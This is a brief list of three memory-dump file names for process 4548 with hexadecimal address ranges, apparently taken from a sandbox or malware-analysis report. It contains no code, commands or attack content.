memory/4548-156-0x0000000006270000-0x00000000062D6000-memory.dmp
memory/4548-157-0x0000000074E20000-0x00000000755D0000-memory.dmp
memory/4548-158-0x0000000006030000-0x0000000006040000-memory.dmp